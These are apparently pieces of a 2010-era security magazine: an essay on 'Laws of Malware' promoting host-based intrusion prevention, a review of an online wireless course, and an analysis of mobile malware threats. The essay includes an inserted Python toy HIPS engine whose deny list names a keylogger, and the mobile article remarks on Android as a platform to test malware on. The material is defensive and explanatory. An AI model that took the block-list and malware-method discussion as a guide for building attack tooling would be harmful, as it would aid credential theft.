In a recent report, 48% of 22 million scanned computers were infected with malware. The recently released APWG Phishing Activity Trends Report detailed record highs in multiple phishing vectors, but also had some interesting information on malware infections (source: http://www.antiphishing.org/). According to the report, the overall number of infected computers in the sample decreased compared to previous quarters; however, 48.35% of the 22,754,847 scanned computers remain infected with malware. What this tells us is that the traditional INFOSEC countermeasures - firewalls, intrusion detection systems, intrusion prevention systems and anti-virus systems - can't keep up with the latest, more intelligently developed and dynamic malware threats (see Figure 2).

And despite that the crimeware/banking trojans 
infections slightly decreased from Q2, over a million 
and a half computers were infected. What's even more 
frightening is that over 30,000 computers are being 
infected with malware daily, while they are still running 
some form of anti-virus software. 

According to the experts at FireEye, understanding the modern malware infection lifecycle is key to designing and deploying effective defenses to protect your network and users from attack and theft (see http://www.modernmalwareexposed.com).

Let's take a closer look at Figure 3, above:

First, in Figure 3, item (1), the employee gets exploited by casual browsing, by clicking on links in what appear to be emails from trusted sources, or via socially engineered binaries. Some of the most recent attacks have PDF files attached with powerful exploit code, taking advantage of the Common Vulnerabilities and Exposures (CVEs) in the Adobe Acrobat viewer. During the rendering of the PDF, the Acrobat viewer is exploited and the dropper is planted.






Second, in Figure 3, item (2), this dropper malware installs itself onto the employees' computers from a compromised web site that appears to anti-virus content filters and proxy servers to be a safe site. This process uses signature-evading techniques and takes advantage of both known and unknown vulnerabilities. Intelligently, this new wave of modern malware can remain inactive, appearing to be dormant, for some period of time before being activated.

Third, in Figure 3, item (3), the malware kicks in and does its job to steal data and in many cases deploy follow-on infections, propagating to SMB servers and embedding into trusted Word, Excel,



Figure 1. AV-Test.org Sample Collection Growth (source: http://www.av-test.org/)

Figure 2. Effectiveness against today's malware: Intrusion Prevention / Antivirus Effectivity vs. Modern Malware (source: http://modernmalwareexposed.org/)



Powerpoint and PDF files, among other trusted format data files. Just one exploit can lead to many infections, while the malware uploads data it steals through key loggers and file grabbers, all under the noses of your traditional up-to-date firewall, patch management, intrusion detection system, intrusion prevention system and content proxy.

It is obvious, from the success rate of today's malware attacks, as can be seen in the USA alone at http://www.privacyrights.org, that these INFOSEC countermeasures are failing. Yes, anti-virus is dead. If you wish to combat the latest malware - or even determine if it exists in your environment - you'll need to understand the basics. I've created the Laws of Malware to help you better understand how it functions, and then I'll talk about a promising, automated solution to the problem.

Malware exploits Common Vulnerabilities and Exposures (CVEs)

Although there might be 9,000,000 signatures in your McAfee or Symantec anti-virus scanner database (and growing exponentially), there are less than 50,000 CVEs. If you close just one CVE, for example, you can block more than 110,000 variants of the W32 malware. If you aren't visiting http://nvd.nist.gov to see what kind of exploitable holes you have in your network, cyber criminals who develop malware certainly are doing so on a daily basis. Remember, everything with an IP address has a CVE; you need to figure out which ones are critical holes and how to patch, reconfigure and remove them - i.e. system hardening.

The Laws of Malware are derived 
from years of Information Security 
(INFOSEC) research. This paper 
explains these laws, which are 
six axioms about the behavior of 
malware. These laws, although 
initially described in this article for 
Hakin9 Magazine should continue to 
be in effect for generations to come 
based upon extrapolation of data 
which is independent of the timeline 
of the current malware trends. Insight 
from these laws should help security 
professionals to prevent malware 
outbreaks on their networks. In 
understanding these laws, one should 
be able to develop cleaner, healthier, 
stronger networks. 
The Laws of Malware: The Six Axioms of Malware Behavior

1. Creation

2. Enumeration

3. Growth

4. Methodology

5. Persistence

6. Specificity

If you feel my discovery is 
important enough to share with 
others, please give Hakin9 the credit they deserve for 
letting me share it with you as follows (source: Hakin9 
Magazine, Gary S. Miliefsky, The Laws of Malware). 
Now that we're past the formalities, let's dig in. 

• Malware Creation - Malware is created by cyber 
terrorists, criminals and hackers. Not all malware is 
created equal. Most are evolutionary improvements 
on existing malware. 

• Malware Enumeration - The average malware sample currently has a dozen names. Because all major anti-virus vendors don't want to share their secret sauce knowledge bases and create a common naming convention, this problem will continue. With the advent of the Common Malware Enumeration (CME) standard, there could be one shared, neutral indexing capability for malware (see: http://cme.mitre.org/), but of course, it remains poorly supported by the anti-virus vendors. Only as a collective group of information security professionals and ethical hackers can we push these vendors to get out of the dark ages of proprietary naming and agree to common naming. Until then, malware outbreaks will continue to grow and be misdocumented. In addition, instead of a shared collective of proactive defenses, there shall continue to be reactive anti-virus vendors writing larger and larger updates to their proprietary MD5 hashed databases until they run out of space and we run out of patience.

Figure 3. Typical Malware Attack (source: http://www.fireeye.com)
(1) Employee Gets Exploited: Malware "Seed" Planted - casual browsing; links in targeted emails; socially engineered binaries
(3) Data Theft & Follow-On Infections - uploads data stolen via keyloggers & file grabbers; one exploit leads to dozens of infections; criminals have complete control over system

• Malware Growth - Malware can be grown and harvested the same day as a vulnerability announcement. Freely available open-source exploit code on the Internet is enabling this phenomenon and it cannot be reversed.

• Malware Methodology - Although 
the number and types of malware in 
the wild continues to rise exponentially, 
there are less than a dozen core 
methodologies used for their execution 
and proliferation. 

• Malware Persistence - Some 
malware exists indefinitely and 
can only be destroyed or removed 
by loss of data while most can be 
removed. Most malware will re-infect 
a host if the hole, also known as the 
Common Vulnerability and Exposure 
(CVE), is not removed (see: http:// 
cve.mitre.org/). 

• Malware Specificity - The majority 
of malware is target-independent, 
designed with one or more of only 
a limited number of recognizable goals. 
However, some of the most successful 
malware attacks against financial 
institutions and government agencies 
have been well targeted. 



Now that you have a basic understanding, let's dig even deeper into these immutable Laws of Malware and then you'll see why Anti-virus is DEAD. However, from the ashes of the 10,000,000 entry MD5 hashed signature database, updated daily by Symantec, McAfee, Kaspersky, Trend Micro, Sophos and others, the phoenix rises - long live HIPS (Host-based Intrusion Prevention Systems). When you're finished reading my axioms, I'll take you into the world of HIPS - the most proactive defense against malware. I would like to tell you that HIPS is a brand new concept. It's not. Consider BlackICE, acquired by ISS, then IBM, and now hiding somewhere in the Area 51 warehouse; just check out the message on their site: http://www.iss.net/support/blackice/FAQ.html and if you follow the link to download it, here's that link:

http://www.iss.net/blackice/update_center/

The requested file is not available for download.

This seems like bad news, doesn't it? BlackICE nailed it - but this system ran on Windows 3.1 to start and is now long gone. However, like the light bulb, bright ideas don't just disappear. Read on and by the end of this article, you'll know what to look for in HIPS and where to look for HIPS.

Malware Creation 

Malware is created by cyber terrorists, criminals and 
hackers (technically they are known as crackers but 
this is now mainstream terminology). Not all malware 
is created equal. Most are evolutionary improvements 
on existing malware. Typically, malware is created by 
taking advantage of commonly known vulnerabilities. 
These software holes are usually discovered by 
computer security experts and are added to the 
Common Vulnerabilities and Exposures (CVE®) 
data dictionary, owned and operated by the MITRE 
Corporation (see: http://cve.mitre.org/ and http: 
//nvd. nist.gov) with federal funding from the United 
States Department of Homeland Security. Malware 
can be created against CVEs in a 1:1 - one piece 
of malware for one CVE or many:1 - there can be 
many exploits for one CVE, coded differently but 
exploiting the same hole. Different malware for the 
same CVE are usually written on top of a single 
malware vector. For example, one malware for the 
Microsoft Windows RPC flaw is the Virus known as 
BAGEL, while another malware for this same hole is 
a worm known as SASSER. Both malware exploits rely on a small piece of code which tests to see if the Windows RPC protocol (APPLICATION or SERVICE) is answering requests (ENABLED) and if the buffer can be overflowed with data (EXPLOIT VECTOR).

The formula for creating a piece of malware is quite simple:

IF FLAWED APPLICATION or SERVICE ENABLED
THEN ATTACK WITH EXPLOIT VECTOR.



If this core malware code is successful, additional 
functionality is added by the creator or malware 
writer. This functionality can range from installing 
backdoors known as rootkits, Trojans, keyloggers, 
spyware, botnets, or zombies to mangling, stealing, 
and/or destroying data as well as ruthless denial of 
service attacks whereby the system being exploited is 
rendered useless or goes offline. 

Creating a blended threat is becoming very popular. These usually have MULTIPLE EXPLOIT VECTORS bundled into a single package. A blended threat works quickly and maximizes damage by combining more than one malware vector. For example, some blended threats like BUGBEAR use the characteristics of both viruses and worms, while also exploiting one or more CVEs. Other well known blended threats of malware that caused tremendous financial damages and downtime include NIMDA and CODE RED.

Malware Enumeration 

The average malware program currently has a dozen names. With the advent of the Common Malware Enumeration (CME) standard, there could be one shared, neutral indexing capability for malware. Because there are so many network security vendors in a fragmented marketplace, each touting to be the best and fastest at finding new exploits, they each currently use their own naming schema. For example, a well known piece of malware that attacks targets through the Messenger protocol on Windows platforms was named by one vendor as Backdoor.irs.Bot. However, another calls it WORM_IRCBOT.JK. Here are just a few of the names for this one piece of malware:

Worm/IRCBot.9374
W32/Ircbot.TT
Win32/Cuebot.K!Worm
Trojan.IRCBot-690
Win32/IRCBot.OO
W32/Graweg.A!tr.bdr
BackDoor.Generic3.GBB!CME-762
Backdoor.Win32.IRCBot.st
backdoor:Win32/Graweg.B
IRC-Mocbot!MS06-040
W32/Oscarbot.KD.wor
W32/Cuebot-M
W32.Wargbot
WORM_IRCBOT.JK

All of the vendors agree that this piece of malware is a worm that opens an IRC back door on the compromised host. It spreads by exploiting the Microsoft Windows Server Service Remote Buffer Overflow Vulnerability (Microsoft Security Bulletin MS06-040). MITRE has named this one vulnerability under the Common Malware Enumeration (CME) convention CME-762. So what is CME and why should you care? CME was developed to address the pandemic model of malware, in which CME identifiers are assigned to high-profile threats. As defined by the CME Threat Assessment Focus Group, comprised of vendors and user representatives, high-profile malware threats include considerable or notable malware threat(s) potentially confusing users, malware threats posing a considerable risk to a user, and/or malware that draws media attention. By visiting http://cme.mitre.org you will have a better understanding of the types of exploits which are attacking your network. Ultimately, if you push your HIPS vendor (don't waste your time with anti-virus vendors) to support CME, it could make things a lot easier for all of us.

Malware Growth 

Malware can be grown and harvested the same day of 
a vulnerability announcement. Freely available open 
source of malware code on the Internet is enabling 
this phenomenon and it cannot be reversed. In all 
computer-based networks there is and always will 
be an inherent window of vulnerability. This is the 
time frame within which defensive countermeasures 
against attacks are reduced, compromised or non- 
existent. 

Numerous vendors tout self-defending and self- 
healing capabilities as well as real-time intrusion 
prevention, however the ability to prevent attacks 
requires foreknowledge that an exploit exists and 
what attack vector it uses. Predicting the future has 
never been a consistently reproducible trait in human 
existence, most importantly in the area of information 
security (INFOSEC), as evidenced in the billions of 
dollars spent in reparations from damages caused 
by malware. Many vendors have developed signature 
or anomaly detection methodologies to try to detect, 
deter or defend against malware. While signature 
methodologies require constant updates of new 
signatures, anomaly detection uses a predictive model 
to detect novel attacks but is prone to a high rate of 
false alarms. 

Once a new vulnerability is uncovered by an intelligent 
exploiter, the window of vulnerability reopens. The 
malware is usually developed quickly, as a derivative of 
prior work or open sources. It is usually launched on the 
unsuspecting targets the same day it is harvested. This 
is known as a ZERO-DAY EXPLOIT. Closing and re- 
opening the window of vulnerability is such a common 
phenomenon that there has become a major discussion 
about stopping these ZERO-DAY EXPLOITS in real- 
time. 

Although it is possible to produce more intelligent systems that utilize some combination of signature-based and real-time anomaly detection methodologies, there will always be yet another surprising piece of malware that was grown on the same day a vulnerability was discovered and that therefore successfully exploits some percentage of the network population. There will be no way to stop the growth, harvesting and deployment of malware that takes advantage of this problem, unless the Internet no longer exists and networking becomes a thing of the past. This is why next-generation Host-based Intrusion Prevention (HIPS) shows promise in combating malware growth and propagation.

Malware Methodology 

Although the number and types of malware in the wild continue to rise exponentially, there are fewer than a dozen core methodologies used for their execution and proliferation. All commonly known vulnerabilities are documented in the National Vulnerability Database, http://nvd.nist.gov, which is powered by MITRE's CVE® program. It is easy to search this database to learn much about the millions of pieces of malware out in the wild by seeing which holes they exploit. Most of the most damaging malware takes advantage of weaknesses or flaws in source code that was not written to account for malicious exploits. For example, one of the most damaging exploits, known as SASSER, caused over a billion dollars in damage, yet it exploited a vulnerability that had been lingering in Windows source code for over a year. SASSER took advantage of a well-known flaw in the remote procedure call (RPC) interface into the Local Security Authority Subsystem Service (LSASS) of the Windows operating system. SASSER exploited a stack-based buffer overflow flaw which is documented as CVE-2003-0533.

In addition to CVE and CME, there is yet one more program you should take a look at - it is called Common Weakness Enumeration or CWE. Malware usually exploits CVEs, and the CVE would not exist if not for poorly written source code. The CWE program looks to define common weaknesses in software so we can develop better, harder solutions from the start. Take a look at this program at http://cwe.mitre.org as well as http://cce.mitre.org/lists/cce_list.html, http://maec.mitre.org/language/enumerations.html and finally http://capec.mitre.org/.

Remote Network Malware 

SASSER is an example of one of the many exploits 
which target a vulnerability in software by using 
networking protocols to remotely connect and exploit 
the system without direct local access. 

Local Host Malware 

This type of malware requires installation of a payload on the target computer system. Rootkits, Trojans, backdoors, keyloggers and viruses need to be locally installed or activated. Usually, a user visits an infected web page or receives an email which contains a script or executable object that they click on to install or download, thereby bypassing the firewall and other security countermeasures.
Social Engineering Malware

Other exploits target weaknesses in end-users by presenting screens which appear to be from a trusted source, in order to obtain private information. This is known as phishing malware.

Denial of Service Malware 

These exploits usually take advantage of software, 
hardware and networking limitations of the target 
system to make a computer resource unavailable to its 
intended users. Usually a high profile web site or critical 
corporate networking resource such as a DNS server, 
router or mail server is the target. 

Malware Persistence 

Some exploits persist indefinitely and can only be destroyed or removed at the cost of losing data, while most can be removed. Most exploits will re-infect a host if the hole, also known as the Common Vulnerability and Exposure (CVE), is not removed. Some of the worst exploits to plague computer systems are known as rootkits, Trojans, adware and spyware. These exploits are very difficult to remove and some require that the operating system be reinstalled or the hard drive be wiped completely, including clearing the boot sector.

Even once a quarantining countermeasure such as anti-spyware or anti-virus software has thoroughly scrubbed the target of the infecting malware, it is highly possible for the same malware to re-infect the target system. The main reason for this persistence is that the weakness being exploited has not been removed.

Until the target has been hardened against attack, it 
can be repeatedly re-infected. Most end-users do not 
know how to rid their system of inherent weakness. Until 
the common vulnerabilities and exposures (CVEs) which 
are being exploited have been remediated, there is no 
guarantee that the same malware will not reappear. 

Removing CVEs is a difficult task. Some can be removed by stopping software services or closing ports which may be needed for end-user productivity. Other CVEs can't be removed until a secure software patch exists that closes the hole. Many times a vendor rushes a patch to market which closes one hole and opens another. Because many malicious exploits attach themselves to trusted applications, services and servers, it is very difficult to completely disinfect a computer network of all of these exploits. The larger and more complex the network becomes, the more daunting the task. Although numerous scrubbing tools have been developed, each one has too many false negative and false positive results to find and quarantine all exploits that have successfully attached themselves to trusted resources.

Malware Specificity 

The majority of exploits are target-independent, designed with one or more of only a limited number of recognizable goals. Although once exploited one feels personally invaded, the reality is that most exploits are target-independent. With the exception of specifically targeted phishing, pharming and information disclosure attacks, usually launched by cybercriminals against financial institutions, or by cyber-terrorists and cyber-spies attacking government networks, most hackers, viruses, worms, Trojans, adware, spyware and other various blended threats have been developed and launched as blindly as the recent spam that Bill Gates received in his inbox at Microsoft. The spam reportedly had the subject line Become a Millionaire - Click here.

Most exploits have been launched throughout the world, causing massive damages, data loss and downtime by being let loose into the wild of the Internet. If you read the Hacker Manifesto, you'll understand that a majority of exploiters seek fame en masse and therefore blindly launch exploits to see how far they will travel and how much damage they will cause. Again, the latest malware that exists without a known signature is called zero day. Sometimes it takes weeks before major vendors have fully tested samples and written a signature test. Hence, as I said in the beginning - anti-virus is dead. It can no longer help you against the latest exploits; you must look elsewhere, and this is where HIPS begins.

So now that you've learned my immutable Laws of 
Malware, let's take a look at HIPS solutions and how 
they can help us against the nastiest threats. 

Host-based Intrusion Prevention (HIPS) 

Because so many Windows systems are compromised - especially laptops - you need to consider host-based intrusion prevention systems (HIPS). Simply put, HIPS blocks malicious software from functioning. The evolution of anti-virus will always be a newer, faster signature testing engine (even if they try to add HIPS) that's one step behind the latest malware attack. Look for a purely HIPS solution that blocks Zero Day malware without signature updates (heuristically), by default. It should help mitigate malware propagation, quarantine malware in real time and not be a CPU or memory hog that makes the end-user PC unusable.

I've been tracking and testing various HIPS solutions for the past few years and I've found a few that you might want to try out for yourself, for free. Remember, the commercial grade HIPS solutions cost money and you usually get what you pay for - free means it might work, it might not, and there may or may not be good documentation, help files or any support whatsoever. I make no guarantees about their ability to defend you, simply that they exist and that this is where to focus our energies when protecting computers (some of these have a 30 day free trial and then you have to pay to keep using them):
Defensewall: http://www.softsphere.com/localizations/
Emsisoft Antimalware: http://www.emsisoft.com/en/software/antimalware/
Hitman Pro: http://www.surfright.nl/en
Mark Jacob's Registry Watcher: http://www.jacobsm.com/mjsoft.htm#rgwtchr
Prevx: http://www.prevx.com
Spyware Terminator: http://www.spywareterminator.com/download/download.aspx
ThreatFire: http://www.threatfire.com/
Winpatrol: http://www.winpatrol.com/

If you go to Google and search for "HIPS host-based intrusion prevention system" you'll probably find many more. In addition, there is a new HIPS solution just hitting the streets from my company, but I'm not here to self-plug, only to educate.

How Host Intrusion Prevention Systems Work 

A HIPS acts like a real-time application, process, service and memory firewall for requests made by an application program to the operating system in which it is running. The biggest challenge is to get a HIPS solution installed on a non-infected system. If the system is infected deeply at the kernel level, or a rootkit is installed as low as the BIOS layer, it is nearly impossible for a HIPS solution to be 100% effective.

If you can install the HIPS solution on a clean system, the chances of new (aka zero-day) malware gaining entry to the operating system are much lower, to your benefit. The smarter, newer HIPS programs attempt to do all the work for you in determining whether an application is a threat. However, some HIPS solutions require you to make decisions such as which programs can be run. This process is usually divided into three areas - a white list, a grey list and a black list. The white list is a list of programs you and your HIPS solution trust, the grey list contains questionable programs that must be watched carefully, and the black list contains programs which cannot be run and which might have already been tested, found infected and quarantined.

When looking for a good HIPS solution, make sure it 
has the following capabilities: 

• Process termination. Some malware will try to shut 
down firewalls and antivirus software. A good HIPS 
engine can control which programs can stop, halt or 
suspend other programs. 

• Which programs are allowed to execute. 
Unidentified malware can be blocked from running. 
The HIPS doesn't need to know that the program is 
malicious. It just needs to know that the program is 
not on the approved list. 

• Which files a program can have read/write permissions to access. A good HIPS engine will typically restrict access to operating system executable files (c:\windows32 in Windows, /usr and /bin in Linux) and configuration files (the registry in Windows, /etc in Linux).

• How much CPU time a program can use. Nasty 
malware programs will typically use up a lot of CPU 
time, continuously trying to infect other files on your 
computer or an SMB file server or other computers 
on the network. 

• Access to network resources and the TCP/IP stack. 
Similar to a firewall, a good HIPS solution can 
control access to and from the local area network 
and the internet. 
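As an added illustration of the checks just listed (not code from the page or from any product named on it), here is a toy HIPS policy engine in Python: it applies a white/grey/black list with default deny for anything unapproved, refuses grey-listed programs the right to stop security processes, write under protected OS directories, exceed a CPU ceiling or reach the network, and tallies the verdicts. All program names, paths, the address and the event log are constructed sample data; the protected directory and process names are assumptions.

```python
"""Toy HIPS policy engine: an added illustration, not code from any product
named on this page. Models the checks the article lists (process termination,
execution white/grey/black lists with default deny, protected OS directories,
a CPU ceiling, network access). All names, paths and events are constructed."""
from dataclasses import dataclass, field
from enum import Enum


class Verdict(Enum):
    ALLOW = "allow"   # white list: trusted, runs unhindered
    WATCH = "watch"   # grey list: may run, but is logged and tightly restricted
    BLOCK = "block"   # black list, or simply not on the approved list


@dataclass
class Policy:
    white: set
    grey: set
    black: set
    # directories only white-listed programs may write to (assumed locations)
    protected_dirs: tuple = (r"C:\Windows\System32", "/usr", "/bin", "/etc")
    # security processes only white-listed programs may stop (assumed names)
    protected_procs: set = field(default_factory=lambda: {"av.exe", "fw.exe"})
    cpu_limit: float = 80.0   # percent; a grey program above this is cut off


def _norm(path):
    """Bring Windows and POSIX paths to one comparable, case-insensitive form."""
    return path.replace("\\", "/").lower().rstrip("/")


def in_protected_dir(policy, path):
    p = _norm(path)
    return any(p == _norm(d) or p.startswith(_norm(d) + "/") for d in policy.protected_dirs)


def classify(policy, program):
    """List membership decides; anything unlisted is denied by default."""
    name = program.lower()
    if name in policy.black:
        return Verdict.BLOCK
    if name in policy.white:
        return Verdict.ALLOW
    if name in policy.grey:
        return Verdict.WATCH
    return Verdict.BLOCK   # HIPS need not know it is malicious, only that it is unapproved


def evaluate(policy, event):
    """Decide one event of kind exec, terminate, write, cpu or network."""
    kind, status = event["kind"], classify(policy, event["program"])
    if status is Verdict.BLOCK or kind == "exec":
        return status
    trusted = status is Verdict.ALLOW
    if kind == "terminate":   # only trusted programs may stop the security tools
        return status if trusted or event["target"].lower() not in policy.protected_procs else Verdict.BLOCK
    if kind == "write":       # grey programs may not touch OS binaries or config
        return status if trusted or not in_protected_dir(policy, event["path"]) else Verdict.BLOCK
    if kind == "cpu":         # runaway CPU use is a propagation symptom
        return status if trusted or event["percent"] <= policy.cpu_limit else Verdict.BLOCK
    if kind == "network":     # like a firewall: only trusted programs reach the network
        return status if trusted else Verdict.BLOCK
    raise ValueError(f"unknown event kind {kind!r}")


def run(policy, events):
    return [(e, evaluate(policy, e)) for e in events]


def summarize(results):
    counts = {v: 0 for v in Verdict}
    for _, verdict in results:
        counts[verdict] += 1
    return counts


# Constructed sample policy and event log (not real products or hosts).
POLICY = Policy(white={"winword.exe", "av.exe", "fw.exe"}, grey={"newtool.exe"}, black={"keylog.exe"})
EVENTS = [
    {"kind": "exec", "program": "winword.exe"},                                   # allow
    {"kind": "exec", "program": "newtool.exe"},                                   # watch
    {"kind": "exec", "program": "dropper.exe"},                                   # block: unknown
    {"kind": "exec", "program": "keylog.exe"},                                    # block: black list
    {"kind": "terminate", "program": "newtool.exe", "target": "av.exe"},          # block
    {"kind": "terminate", "program": "av.exe", "target": "newtool.exe"},          # allow
    {"kind": "write", "program": "newtool.exe", "path": r"C:\Windows\System32\drivers\x.sys"},  # block
    {"kind": "write", "program": "newtool.exe", "path": r"C:\Users\bob\notes.txt"},             # watch
    {"kind": "write", "program": "winword.exe", "path": "/etc/hosts"},            # allow
    {"kind": "cpu", "program": "newtool.exe", "percent": 95.0},                   # block
    {"kind": "network", "program": "newtool.exe", "dest": "203.0.113.5:80"},      # block
    {"kind": "network", "program": "winword.exe", "dest": "203.0.113.5:443"},     # allow
]

if __name__ == "__main__":
    for event, verdict in run(POLICY, EVENTS):
        print(f"{verdict.value:5}  {event}")
    print(summarize(run(POLICY, EVENTS)))
```

The point the article makes is visible in the unknown dropper: it is blocked without the engine knowing anything about it beyond its absence from the white list.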

There are many advantages to HIPS solutions. Some need no updates, so there is no need for a paid subscription. However, the best HIPS solutions deploy a hybrid approach: the ability to heuristically determine that a program is malicious while also being able to match up its signature to a database, to decompile the program in real time or to watch it in a sandbox and look for malware characteristics. As a result, new, unidentified malware, known as zero day exploits, can be stopped immediately, while an anti-virus solution is usually hours or days too late.

If properly deployed, a HIPS solution can provide 
a more pre-emptive and proactive solution to the growing 
number of new threats. Well built HIPS solutions don't 
eat up your hard drive, your CPU or your productivity 
like anti-virus programs. We should look towards HIPS 
as our future in defense against the latest threats - long 
live HIPS. HIPs HIPs Hurray! 
Class on Demand Review



Implementing Wireless Networks 
Using the HP ProCurve MultiService 
Mobility Solution 



Traditional IT training has always been in the classroom 
where you spend a week or two with strangers and 
just follow the instructor through the coursebook, but 
in recent years more and more courses are becoming 
available via online learning platforms. 

Class on Demand is one such company providing a 
wide variety of courses and I was given the opportunity 
to try out their Implementing Wireless Networks Using 
the HP ProCurve MultiService Mobility Solution course. 

This course describes how to address your business 
requirements with regard to designing, testing and 
implementing a complete solution using Multi Service 
networks. The course is broken down into 10 easy 
modules with each module running under 40 minutes, 
some are a lot shorter than this. 

By keeping it this short I feel that they manage to keep the viewer engaged with the course by providing just the right amount of information during the time period allowed. The instructor is clear and concise throughout and he actually appears to enjoy the information he is trying to convey to the viewer, as even though he is likely to be reading from a script there isn't any of the usual monotone that you sometimes get with this type of training, so you won't be falling asleep to this one!

The application itself uses Silverlight so you will need to add this to your browser if you don't already have it. Initially I tried to use it on my Ubuntu but I found that it wouldn't work on my Ubuntu as the Moonlight add-on to Firefox wouldn't play DRM protected media. Once I booted up into Windows and had the Silverlight add-on installed in my Firefox, everything loaded up just fine.

You are given three options on how you wish to view the training: either in a small window, the full width of the web page or full screen. The player itself is very simple to use, with the usual controls of pause, stop, play etc. and volume control. The player was very responsive to any use of the controls and when changing the screen size through the three different options. The picture itself was smooth and clear throughout with excellent sound levels; I didn't notice any tininess throughout the course.

For those of you who have never been involved in implementing wireless solutions, the first module provides a good, although a little brief, overview of 802.11 technology. Each module has a good description of what information is contained within that section. The titles of each class clearly state what you will learn.



http://www.classondemand.net/IT/catalog.aspx 
Cost: $995 
Figure 1.

The content provided was very detailed in my opinion, but not over the top technically, so that I wasn't bombarded with too much information on a new subject. Being able to jump around the course was quite handy: for those moments when I wasn't sure about something, I could quickly start up a previously viewed module to double check, as the modules were always quick to load.

I enjoyed this course throughout and found it very 
educational and informative as it was using something 
that I hadn't previously had any experience with (HP 
ProCurve MultiService Mobility), so it was good to 
actually have something to learn :) I have used various 
other online training courses in the past and this course 
was definitely in the top 3 regarding the content and 
information provided and the actual delivery of that 
content, as it was a pleasure to use. 

One thing I do have to mention is their superb technical support, as I had an issue with the training not working for me all the time, and the response I received was fantastic: a more or less immediate reply to my email and constant updates as to the progress of the issue. They worked hard to identify the issue and resolve it so that I was able to view the rest of the course in a very short space of time. I am still convinced it wasn't anything of their doing and it was my ISP that was at fault, but they still made changes to allow me to continue on with the training. In my opinion the backup of any online training has to be an excellent judge of the streaming service they will deliver, and this was an excellent example.



MICHAEL MUNT 
Mobile Malware - the new cyber threat



An analysis of the potential malware threat to mobiles 



Mobile phone malware first appeared in June 2004 and it was called Cabir. The mobile-phone features at most risk are text messaging (using social engineering), the contacts list, video and buffer overflows. GSM, GPS, Bluetooth, MMS and SMS will indeed be some of the attack vectors to expect this year and beyond.



Research earlier this year (2010) suggested that 35% of all detected mobile malware operated via the Internet - so why the sharp rise in mobile malware? There is a perfectly logical answer to this - mobiles are fast becoming the primary device for accessing the internet. Another potential reason is the growth of mobile application development, which allows users to stay in touch using a Twitter or Facebook third-party application.

Statistic: 35% of all detected mobile malware is 
operated via the Internet (2010) 

Gartner claims from recent research that mobiles accounted for 14.2% of the overall mobile market - malware and cyber criminals will no doubt be observing these trends closely. The 14.2% is expected to rise to nearly 20% by the end of 2010. The cost reductions associated with lower cost contract data tariffs have also contributed to this surge in demand for mobiles - so users are more willing to surf the internet using their mobile. You can now see clearly why cybercriminals see the mobile exploit opportunity.

The mobile malware life cycle 

A few years ago mobile malware spread by Bluetooth; 
MMS; SMS, infecting files modifying/replacing icons; 
locking memory cards; and installing fake fonts. 
Now though, new technology has been adopted by 
cybercriminals - these include DDoS (damaging user 
data); disabling an operating system; downloading 
silent files from the internet; silent calling PRS/ 
International numbers; infecting USB sticks; and 
stealing mobile banking user login and password 
credentials. 



Mobile vendors/network operator responsibility

Most of the mobile vendors and operators, including the manufacturers, have specific code signing procedures for installation of applications. Symbian was one of the first to adopt a rigorous application signing procedure, with Apple following suit later. Android and Bada on the other hand have opened up their source to third-party applications and in effect handed over security to the mobile user.

BlackBerry though has remained steadfast in believing that security is key, which is why they are leading the way when it comes to operating system, application and third-party certification. The code signing approach is under attack from companies such as Google (with Android), and Apple, with its popular iPhone, is also under attack from researchers, developers and analysts alike.

Recently in 2010 the iPhone was jailbroken. This is 
when users remove the code signing restrictions on their 
iPhone which allows them to install any application they 
want. This though opens the door to cybercriminals. A 
jailbroken Apple iPhone has indeed been targeted by 
malware writers. Apple is responding though by starting 
to lock certain IDs out of the Apple Application Store 
which will inevitably lead to ALL jailbroken iPhones 
being locked out of the store. 

An iPhone utility that lets iPhone 4 owners run non-Apple approved applications was launched this month (August, 2010). Jailbreakme 2.0 works on all iPhones and iPod touches running iOS4. The US legal establishment, through the Copyright Office ruling, has stated that the practice of removing restrictions on third-party applications falls under fair use guidelines. It's clear that if Apple loses this case, application certification may well help trigger a mobile malware epidemic in years to come.

If you want to find a platform to test your mobile 
malware on then there is no better operating system 
than Android. It goes out of its way to allow developers 
to self-sign their own application certificates. 

Statistic: Google Android phone shipments increase 
by 886%, Canalys, Aug 2010 

Take a closer look at the Android code signing and 
you will be alarmed to read that the trusted certificate 
authority requires that the certificate does not expire 
before October 22, 2033 - that works out at a certificate 
validity period of 25 years. Google has very much 
opened the door to malware writers with this and one 
suspects that this is the platform (see Figure 1 and 
statistic to see why) cybercriminals will use to distribute 
their malicious code and the botnet payloads of the 
future. 

Mobile attack vectors 

Mobile malware writers have a hard task to deliver their 
malicious payloads considering the multitude of mobile 
operating systems that are in the market. Consider the 
PC world and the main player is Microsoft - consider 
the mobile world and you have Symbian, Apple, 
BlackBerry, Android, Microsoft and Bada (Samsung) to 
name a few. 

It's very challenging indeed to spend time and money on developing malware for these different operating systems. Until we have a clear winner like in the PC world - think Microsoft - it is possible we will not see the surge in malware infected mobiles for another few years. That said, cybercriminals appear to be concentrating some of their efforts (and money) in the mobile world - most likely just touching the edges.

Figure 2 below from Kaspersky highlights that there were 39 new mobile malware families and 257 new mobile malware variants identified in 2009. This is in comparison to 30 new families and 143 new modifications identified in 2008. Reference: Kaspersky, 2010 (c)

In the past few years we have seen a variety of attacks targeting the Symbian S60 3rd edition as well as the standard SMS and MMS scam methods. There are also the applications that are developed (see next section) - most users have no idea what an application (regardless of whether it is third-party or not) is doing, i.e. calling a remote server and racking up PRS/international rogue call charges without the user's knowledge.



Remote Server Calling is something that appeared in the latter part of last year. The remote hosted servers can be hacked for malicious data collection/PRS sending and delivery of Trojans, as well as delivering malicious payloads. Another attack vector will be Mobile Ready Malware or MRM, to coin an acronym. MRM is where a mobile resident malware will be activated or updated from a remote server without the user ever knowing.

The MRM method would work very much like a botnet - allowing mobiles (without the user's knowledge) to connect to a remote server to commence uploading more malware to be delivered by a user's contact book, SMS or MMS for example.

Another attack vector could be DDoS. Denial of Service could bring down a mobile network by flooding the network with data packets. Therefore expect mobile data backup businesses to grow - this will be a niche market over the coming years. Mobile banking is also going to increase. Android Marketplace recently approved a malicious application which masqueraded as the official First Tech Credit Union banking application. It collected unsuspecting people's banking information.

One particular trick of the malware writers is to hide a malicious program within legitimate applications. This allows the malicious file to work silently, undisturbed by users' prying eyes. Another trick is to disable the application certificate check, whereby a user will be unaware whether an application is legitimate. These are simple methods that work.

Application Stores - third-party applications 

There is clear evidence to suggest that there is a strong correlation between the growth in the number of applications and the development of malware.

Figure 1. Worldwide mobile market - Canalys, August 2010 (c)

Mobile application stores provide breeding grounds for malicious activity, which then provides the opportunity to test malicious applications.

